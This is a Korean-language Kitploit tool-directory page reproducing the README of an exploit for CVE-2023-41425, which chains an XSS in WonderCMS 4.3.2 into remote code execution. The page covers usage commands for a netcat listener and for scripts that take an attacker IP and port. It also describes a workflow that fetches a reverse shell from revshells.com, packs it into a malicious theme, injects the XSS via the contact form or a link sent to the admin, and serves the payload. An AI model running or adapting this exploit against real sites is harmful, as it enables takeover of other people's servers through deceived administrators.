Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425 — CVE-2023-41425 Refurbish | Kitploit
도구/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Payload GenerationExploitationShellcodeWeb Application ExploitationPenetration TestingRemote Access Tool
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
31년 전아직 검토되지 않음

WonderCMS 4.3.2 XSS to RCE 익스플로잇

개요

이 스크립트들은 WonderCMS 4.3.2의 XSS(사이트 간 스크립팅) 취약점을 이용하여 **원격 코드 실행(RCE)**을 달성합니다. XSS 페이로드는 관리자가 트리거하면 악의적으로 제작된 테마 모듈을 활용하여 대상 서버에 자동으로 리버스 셸을 설치합니다. 리버스 셸은 revshells.com에서 가져와 실행되며, 공격자에게 서버에 대한 원격 액세스를 부여합니다.


목차

  • 전제 조건
  • 스크립트 1: 자동 익스플로잇
    • 기능
    • 사용법
  • 스크립트 2: 수동 익스플로잇
    • 기능
    • 사용법
  • 참고 사항
  • 라이선스

전제 조건

두 스크립트 중 하나를 성공적으로 실행하려면 다음 도구와 조건이 필요합니다:

  1. Bash 셸: 두 스크립트 모두 Bash 셸을 사용하는 Linux 환경용으로 작성되었습니다.
  2. netcat (nc): 리버스 셸 연결을 수신 대기하는 데 사용됩니다.
  3. Python3: 간단한 Python HTTP 서버가 XSS 페이로드를 호스팅하는 데 사용됩니다.
  4. WonderCMS 4.3.2: 대상이 취약한 버전의 WonderCMS를 실행 중이어야 합니다.
  5. 관리자 상호 작용: 페이로드가 XSS를 트리거하려면 관리자가 필요하며, 이를 통해 리버스 셸이 실행됩니다.
  6. revshells.com: 리버스 셸 페이로드는 revshells.com에서 동적으로 다운로드됩니다.

스크립트 1: 자동 익스플로잇

POC

Pasted image 20241010021603

기능

이 버전의 익스플로잇은 활성 nc 리스너를 자동으로 확인하고, 리버스 셸을 다운로드하고, HTTP 서버를 시작하고, 페이로드를 전송한 다음 관리자가 리버스 셸을 트리거할 때까지 기다립니다.

  • 자동 리버스 셸 설정: revshells.com에서 미리 생성된 리버스 셸을 다운로드합니다.
  • XSS 페이로드 주입: 대상의 문의 양식에 XSS 페이로드를 주입합니다.
  • HTTP 서버 관리: 리버스 셸 페이로드를 호스팅하기 위해 Python HTTP 서버를 자동으로 시작합니다.
  • nc 리스너 확인: 진행 전에 리스너가 실행 중인지 확인합니다.
  • 페이로드 자동 전송: 사용자 상호 작용 없이 페이로드를 자동으로 전송합니다.

사용법

  1. nc 리스너가 지정된 포트에서 실행 중인지 확인합니다:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. 다음 명령으로 스크립트를 실행합니다:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    예시:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

작업 흐름

  1. 리버스 셸 다운로드: 스크립트가 revshells.com에서 리버스 셸을 다운로드합니다.
  2. 리버스 셸 수정: 리버스 셸 스크립트가 공격자의 IP와 포트로 업데이트됩니다.
  3. ZIP 페이로드 생성: 리버스 셸이 포함된 ZIP 파일이 생성됩니다.
  4. XSS 페이로드 제작: 리버스 셸을 설치하는 XSS 페이로드가 생성되어 취약한 문의 양식에 주입됩니다.
  5. HTTP 서버 자동 시작: 스크립트가 악성 페이로드를 제공하기 위해 Python HTTP 서버를 시작합니다.
  6. 페이로드 자동 전송: XSS 페이로드가 관리자에게 자동으로 전송됩니다.

스크립트 2: 수동 익스플로잇

POC

Pasted image 20241010013048

웹사이트 필드에 스크립트가 제공하는 익스플로잇을 사용하세요...

Pasted image 20241010013218

기능

이 버전은 사용자가 nc 리스너와 XSS 페이로드 트리거를 수동으로 관리해야 합니다. 자동 프로세스가 바람직하지 않은 시나리오에 더 적합합니다.

  • 수동 리버스 셸 설정: 리스너가 실행 중인지 확인하는 것은 사용자의 책임입니다.
  • 수동 XSS 트리거: 스크립트는 관리자에게 보낼 악성 링크를 제공하지만, 페이로드는 수동으로 트리거해야 합니다.
  • HTTP 서버 관리: XSS 페이로드를 호스팅하기 위해 Python HTTP 서버를 시작합니다.

사용법

  1. nc 리스너가 지정된 포트에서 실행 중인지 확인합니다:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. 다음 명령으로 스크립트를 실행합니다:
    root@kitploit:~
    ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    예시:
    root@kitploit:~
    ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

작업 흐름

  1. 리버스 셸 다운로드: revshells.com에서 리버스 셸을 다운로드합니다.
  2. 리버스 셸 수정: 리버스 셸을 공격자의 IP와 포트로 업데이트합니다.
  3. ZIP 페이로드 생성: 리버스 셸이 포함된 ZIP 파일을 생성합니다.
  4. XSS 페이로드 제작: 리버스 셸을 설치하는 XSS 페이로드를 생성합니다.
  5. 악성 링크 표시: 트리거를 위해 관리자에게 보내야 하는 링크를 표시합니다.
  6. HTTP 서버 시작: 페이로드를 호스팅하기 위해 Python HTTP 서버를 시작합니다.

참고 사항

  • 관리자 상호 작용: 두 익스플로잇 모두 WonderCMS 관리자가 취약한 페이지를 방문하여 XSS 페이로드를 트리거하는 것에 의존합니다. 트리거되면 공격자의 머신과 리버스 셸이 연결됩니다.
  • 방화벽/IDS/IPS: 의심스러운 활동을 차단하거나 경고할 수 있는 방화벽 또는 침입 탐지 시스템(IDS)으로 보호되는 환경에서 이러한 익스플로잇을 실행할 때는 주의하세요.
  • 책임 있는 공개: 대상이 취약한 것을 발견하면 항상 윤리적 지침을 따르고 적절한 당사자에게 취약점을 보고하세요.

라이선스

도구 다운로드